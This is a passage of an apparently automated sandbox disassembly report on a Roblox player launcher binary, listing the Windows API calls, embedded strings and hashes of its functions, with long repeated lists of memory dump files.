              • API ID: FormatFreeHandleLocalMessageModuleSimpleString::operator=
              • String ID: $A connection with the server could not be established.$An error occurred in the secure channel support.$The operation timed out.$The server name or address could not be resolved.$Unknown error code 0x{:08x}.
              • API String ID: 3119777634-2311890575
              • Opcode ID: db72ff3b1c6632b8ed0f318e4d489d645653024a4f7fcbb20267ff66d7896621
              • Instruction ID: f0c42359a24bfc07733b453f87c65bed00e2b5a4666e6b148210af1cfd582030
              • Opcode Fuzzy Hash: db72ff3b1c6632b8ed0f318e4d489d645653024a4f7fcbb20267ff66d7896621
              • Instruction Fuzzy Hash: E9D10571D00209DBDF14CF68CC44BEEBBB5FF88354F148659E518A7291E778AA84CBA1
              APIs
                • Part of subcall function 00767F90: RegCloseKey.ADVAPI32(00000000), ref: 00768039
              • GetModuleHandleW.KERNEL32(Advapi32.dll,?,?), ref: 0076838E
              • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 007683A3
              • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020019,00000000,?,?), ref: 007683E9
              • RegCloseKey.ADVAPI32(00000000,?,?), ref: 007683FD
              • GetModuleHandleW.KERNEL32(Advapi32.dll,?,?), ref: 007684AB
              • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 007684C0
              • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020019,00000000,?,?), ref: 00768506
              • RegCloseKey.ADVAPI32(00000000,?,?), ref: 0076851A
              • RegCloseKey.ADVAPI32(00000000,?,?), ref: 00768606
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Close$AddressHandleModuleOpenProc
              • String ID: Advapi32.dll$ClientChannelProbabilityString$RegOpenKeyTransactedW$version
              • API String ID: 1177782415-1752450418
              • Opcode ID: eab4f0abd4fab6f7e464082ab5c1102a7ba07800d8286e0cfb0fd86a0f3b9311
              • Instruction ID: cdfe39913f70d23f552a54380c822ef0fa91e3311892aa1fe1b3573a52e7f312
              • Opcode Fuzzy Hash: eab4f0abd4fab6f7e464082ab5c1102a7ba07800d8286e0cfb0fd86a0f3b9311
              • Instruction Fuzzy Hash: 38B1D574A00249AFDF64CF98DC18BAE7BB5EB44704F108219ED07A7292DF799944CB62
              APIs
              • __floor_pentium4.LIBCMT ref: 0075E56F
              • Concurrency::cancel_current_task.LIBCPMT ref: 0075E5B4
              • RegDeleteValueW.ADVAPI32(?,name), ref: 0075E75E
              • RegQueryValueExW.ADVAPI32(?,expiration,00000000,?,?,?), ref: 0075E797
              • RegDeleteValueW.ADVAPI32(?,expiration), ref: 0075E7D5
              • RegCloseKey.ADVAPI32(?), ref: 0075E83F
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Value$Delete$CloseConcurrency::cancel_current_taskQuery__floor_pentium4
              • String ID: *.*$Channel$Failed to delete channel expiration in %s$Failed to delete channel name in %s$expiration$name
              • API String ID: 1833052805-1638369838
              • Opcode ID: f7f3f4fc9acde4dc09f493c1c6e7ceb285a30f25fab1bc3bf0d89bbcc69cf973
              • Instruction ID: 75472d690d575457d5e990af684b2d2f6710d0def72a853468113ca53dcf1495
              • Opcode Fuzzy Hash: f7f3f4fc9acde4dc09f493c1c6e7ceb285a30f25fab1bc3bf0d89bbcc69cf973
              • Instruction Fuzzy Hash: 69C12771D002489BDB18DFA8DC45BDDBBB8FF48315F144628F815E7282E778AA58CB91
              APIs
              • GetThreadLocale.KERNEL32 ref: 008A8DA0
              • GetUserDefaultLCID.KERNEL32 ref: 008A8DB3
              • GetSystemDefaultLCID.KERNEL32 ref: 008A8DCD
              Strings
              • unsigned int __thiscall crashpad::PEImageResourceReader::GetEntryFromResourceDirectoryByLanguage(unsigned int,unsigned short) const, xrefs: 008A8E55, 008A8F14
              • bool __thiscall crashpad::PEImageResourceReader::ReadResourceDirectory(unsigned int,struct _IMAGE_RESOURCE_DIRECTORY *,class std::vector<struct _IMAGE_RESOURCE_DIRECTORY_ENTRY,class std::allocator<struct _IMAGE_RESOURCE_DIRECTORY_ENTRY> > *,class std::vector<s, xrefs: 008A8C68, 008A8D1E
              • ../../../snapshot/win/pe_image_resource_reader.cc, xrefs: 008A8C63, 008A8D19, 008A8E50, 008A8F0F
              • in , xrefs: 008A8F2F
              • expected non-directory for entry language , xrefs: 008A8F03
              • could not read resource directory from , xrefs: 008A8C57
              • could not read resource directory ID entries from , xrefs: 008A8D0D
              • expected non-directory for entry in , xrefs: 008A8E44
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Default$LocaleSystemThreadUser
              • String ID: in $../../../snapshot/win/pe_image_resource_reader.cc$bool __thiscall crashpad::PEImageResourceReader::ReadResourceDirectory(unsigned int,struct _IMAGE_RESOURCE_DIRECTORY *,class std::vector<struct _IMAGE_RESOURCE_DIRECTORY_ENTRY,class std::allocator<struct _IMAGE_RESOURCE_DIRECTORY_ENTRY> > *,class std::vector<s$could not read resource directory ID entries from $could not read resource directory from $expected non-directory for entry in $expected non-directory for entry language $unsigned int __thiscall crashpad::PEImageResourceReader::GetEntryFromResourceDirectoryByLanguage(unsigned int,unsigned short) const
              • API String ID: 3126616036-1481966931
              • Opcode ID: 5cf572a6f8b62479b0517bebba730ce1bc66192bb18f57264d49ceed89d79bff
              • Instruction ID: 3f03bb818549841d336d40861ce8989ed799571551f6c6e8eab49c9a59ab7d61
              • Opcode Fuzzy Hash: 5cf572a6f8b62479b0517bebba730ce1bc66192bb18f57264d49ceed89d79bff
              • Instruction Fuzzy Hash: F4C11671A00208EBEF14EF68DC46FAE7765FF45310F044668F955E76C2EB74AA408BA1
              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 00731C5A
              • std::_Lockit::_Lockit.LIBCPMT ref: 00731C78
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00731C98
              • std::_Facet_Register.LIBCPMT ref: 00731E07
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00731E1F
              • Concurrency::cancel_current_task.LIBCPMT ref: 00731E37
              • Concurrency::cancel_current_task.LIBCPMT ref: 00731E3C
              • Concurrency::cancel_current_task.LIBCPMT ref: 00731E41
                • Part of subcall function 0072DE70: ___std_exception_copy.LIBVCRUNTIME ref: 0072DEAC
                • Part of subcall function 0072DE70: ___std_exception_destroy.LIBVCRUNTIME ref: 0072DED7
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: std::_$Lockit$Concurrency::cancel_current_task$Lockit::_Lockit::~_$Facet_Register___std_exception_copy___std_exception_destroy
              • String ID: argument not found$false$true
              • API String ID: 1338633224-2625561180
              • Opcode ID: b0fdc79813583d9f0675268036d2a28da38c5951986f76c7bb12c01e6f466ee1
              • Instruction ID: d0b142e9ec8a361a2e6f329e1fb9a7ca3ee6dff9aa09ef08641338732dea2edb
              • Opcode Fuzzy Hash: b0fdc79813583d9f0675268036d2a28da38c5951986f76c7bb12c01e6f466ee1
              • Instruction Fuzzy Hash: DF81A075900208DFEB21DFA4D981BAEBBB8FF44710F14816DE805A7342E735AE45CBA1
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID:
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 0-1866435925
              • Opcode ID: 3f09c499fbb383128508450efc34b7a4a154dfb26fe19aef6808d70e516395c0
              • Instruction ID: 3aabf943a40892e54dfa0af96d9c2150c8eb15e2aae399ddfb1ae9feb47bc879
              • Opcode Fuzzy Hash: 3f09c499fbb383128508450efc34b7a4a154dfb26fe19aef6808d70e516395c0
              • Instruction Fuzzy Hash: 8771C075A01214EFEB20CF98D985BADB7E8FF48310F14816AE9199B352D7B5ED00CB90
              APIs
              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,00000000,SOFTWARE\Classes\,00000011,00000000,-00000002), ref: 00771772
              • RegOpenKeyExW.ADVAPI32(00000000,shell\open\command,00000000,00020019,?), ref: 0077183C
              • RegCloseKey.ADVAPI32(00000000), ref: 0077184B
              • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,?,?,?), ref: 0077187D
              • RegCloseKey.ADVAPI32(00000000), ref: 007718B8
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: CloseOpen$QueryValue
              • String ID: %ws$SOFTWARE\Classes\$shell\open\command
              • API String ID: 3523390698-3896999985
              • Opcode ID: 3a681cc0349f6b06234af7050bda457c3cc03b709e7553422da63d381a1f01f3
              • Instruction ID: 6df5d745cc3ff65884d254a5d200ea12bf8a52ef75bf1cd2a60efe8f670a58fe
              • Opcode Fuzzy Hash: 3a681cc0349f6b06234af7050bda457c3cc03b709e7553422da63d381a1f01f3
              • Instruction Fuzzy Hash: 0502C171900218DFDF14DFA8CC44BEEB7B8BF49314F548199E409E7291E774AA45CBA1
              APIs
              • ___std_exception_copy.LIBVCRUNTIME ref: 0072DEAC
              • ___std_exception_destroy.LIBVCRUNTIME ref: 0072DED7
              • SetLastError.KERNEL32(00000000,?,?), ref: 0072DF43
              • FindWindowW.USER32(WindowsClient,00000000), ref: 0072DF57
              • GetLastError.KERNEL32 ref: 0072DFB6
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ErrorLast$FindWindow___std_exception_copy___std_exception_destroy
              • String ID: WindowsClient
              • API String ID: 2222484027-2638054540
              • Opcode ID: 7842aa7b67e214c93d8ee2eb960fba81c986d0f6b24f3e9b7122c9a2c87f31be
              • Instruction ID: 7777b91207357c86946f478888cd860928c0594dcbfd5e8e9e05e51c7855e802
              • Opcode Fuzzy Hash: 7842aa7b67e214c93d8ee2eb960fba81c986d0f6b24f3e9b7122c9a2c87f31be
              • Instruction Fuzzy Hash: 83D10375D002189FDB14CF98E845BEEBBF5FB89310F14826AE805A7391D779AD04CBA1
              APIs
              • PathFileExistsW.SHLWAPI(?,?,?,00000000,?,?), ref: 007375C9
              • SetLastError.KERNEL32(00000000,?,?,00000000,?,?), ref: 00737706
              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000000,?,?), ref: 00737719
              • GetFileAttributesW.KERNEL32(?,?,?,00000000,?,?), ref: 00737737
                • Part of subcall function 0071B130: ___std_exception_copy.LIBVCRUNTIME ref: 0071B163
              • GetLastError.KERNEL32(00000000,?,?,00000000,?,?), ref: 007377E2
              Strings
              • Path {} is not a directory, xrefs: 0073779C
              • Failed to get attribute of {}, xrefs: 0073775C
              • Failed to create directory {}, error: {}, xrefs: 00737813
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ErrorFileLast$AttributesCreateDirectoryExistsPath___std_exception_copy
              • String ID: Failed to create directory {}, error: {}$Failed to get attribute of {}$Path {} is not a directory
              • API String ID: 3693151422-1360415715
              • Opcode ID: 9af844b44b07e114f364112909b7c43fd8a940e53460bb2158786da2ed812829
              • Instruction ID: f85bbd99c910ab19a855e31805a355114c437c3e79bb41f37b45c9705eee750a
              • Opcode Fuzzy Hash: 9af844b44b07e114f364112909b7c43fd8a940e53460bb2158786da2ed812829
              • Instruction Fuzzy Hash: 908129B1904608EBDF24DFACDC4ABEE77B8BB05314F500568F511A72D2E7789A04CB61
              APIs
              • FormatMessageW.KERNEL32(00001300,00000000,?,00000000), ref: 0073CBB2
              • LocalFree.KERNEL32(00000000,00000000,-00000002,?), ref: 0073CCD3
              Strings
              • Success, xrefs: 0073CC67
              • Unknown error 0x%8.8x, xrefs: 0073CC47
              • A connection with the server could not be established, xrefs: 0073CC1A
              • The operation timed out, xrefs: 0073CBFA
              • An error occurred in the secure channel support, xrefs: 0073CC87
              • The server name or address could not be resolved, xrefs: 0073CBDA
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
